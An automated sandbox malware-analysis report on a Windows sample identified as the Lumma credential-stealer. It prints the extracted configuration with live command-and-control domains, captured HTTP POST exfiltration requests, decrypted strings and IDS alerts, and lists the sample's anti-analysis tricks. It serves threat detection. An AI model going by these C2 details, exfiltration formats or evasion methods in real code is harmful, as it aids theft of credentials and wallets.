Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1546270
MD5:55bfaa52fb91ccaa609fda3e4ba384f1
SHA1:82e95791abe38fd20575fb1a92d9a51030012f61
SHA256:8461b98ede75eee3c04396a1600422e47a21eb3d575ec02b3a913e66dbda3749
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 1532 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 55BFAA52FB91CCAA609FDA3E4BA384F1)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["founpiuer.store", "navygenerayk.store", "thumbystriw.store", "necklacedmny.store", "presticitpo.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2157368828.0000000001440000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2156627586.0000000001440000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2155159507.0000000001440000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2157461915.0000000001440000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2156461163.0000000001440000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 50 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:19.694593+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549711TCP
              2024-10-31T17:26:58.088523+010020229301A Network Trojan was detected52.149.20.212443192.168.2.549910TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:03.499606+010020283713Unknown Traffic192.168.2.549704188.114.97.3443TCP
              2024-10-31T17:26:05.047853+010020283713Unknown Traffic192.168.2.549705188.114.97.3443TCP
              2024-10-31T17:26:07.427537+010020283713Unknown Traffic192.168.2.549706188.114.97.3443TCP
              2024-10-31T17:26:09.643578+010020283713Unknown Traffic192.168.2.549707188.114.97.3443TCP
              2024-10-31T17:26:11.826936+010020283713Unknown Traffic192.168.2.549708188.114.97.3443TCP
              2024-10-31T17:26:14.841620+010020283713Unknown Traffic192.168.2.549709188.114.97.3443TCP
              2024-10-31T17:26:16.600929+010020283713Unknown Traffic192.168.2.549710188.114.97.3443TCP
              2024-10-31T17:26:18.763888+010020283713Unknown Traffic192.168.2.549713188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:04.312757+010020546531A Network Trojan was detected192.168.2.549704188.114.97.3443TCP
              2024-10-31T17:26:06.296342+010020546531A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:04.312757+010020498361A Network Trojan was detected192.168.2.549704188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:06.296342+010020498121A Network Trojan was detected192.168.2.549705188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:03.499606+010020571241Domain Observed Used for C2 Detected192.168.2.549704188.114.97.3443TCP
              2024-10-31T17:26:05.047853+010020571241Domain Observed Used for C2 Detected192.168.2.549705188.114.97.3443TCP
              2024-10-31T17:26:07.427537+010020571241Domain Observed Used for C2 Detected192.168.2.549706188.114.97.3443TCP
              2024-10-31T17:26:09.643578+010020571241Domain Observed Used for C2 Detected192.168.2.549707188.114.97.3443TCP
              2024-10-31T17:26:11.826936+010020571241Domain Observed Used for C2 Detected192.168.2.549708188.114.97.3443TCP
              2024-10-31T17:26:14.841620+010020571241Domain Observed Used for C2 Detected192.168.2.549709188.114.97.3443TCP
              2024-10-31T17:26:16.600929+010020571241Domain Observed Used for C2 Detected192.168.2.549710188.114.97.3443TCP
              2024-10-31T17:26:18.763888+010020571241Domain Observed Used for C2 Detected192.168.2.549713188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:02.797778+010020571291Domain Observed Used for C2 Detected192.168.2.5559271.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:02.812763+010020571271Domain Observed Used for C2 Detected192.168.2.5622871.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:02.837665+010020571231Domain Observed Used for C2 Detected192.168.2.5519001.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:02.774640+010020571311Domain Observed Used for C2 Detected192.168.2.5609471.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:02.824202+010020571251Domain Observed Used for C2 Detected192.168.2.5562171.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-31T17:26:10.884020+010020480941Malware Command and Control Activity Detected192.168.2.549707188.114.97.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.1532.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["founpiuer.store", "navygenerayk.store", "thumbystriw.store", "necklacedmny.store", "presticitpo.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
              Multi AV Scanner detection for submitted file
              Source: file.exeReversingLabs: Detection: 39%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2205212402.00000000009C1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49710 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:55927 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:60947 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:56217 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:62287 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:51900 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49713 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49707 -> 188.114.97.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 188.114.97.3:443
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49711
              Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 52.149.20.212:443 -> 192.168.2.5:49910
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1267Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585874Host: necklacedmny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
              Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
              Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202261431.0000000001421000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, file.exe, 00000000.00000003.2081624288.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2176681521.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153793686.0000000001432000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128973004.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126105987.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206644347.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106754751.0000000001431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
              Source: file.exe, 00000000.00000002.2206644347.0000000001434000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store//
              Source: file.exe, 00000000.00000003.2176681521.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/7
              Source: file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106754751.0000000001431000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/O
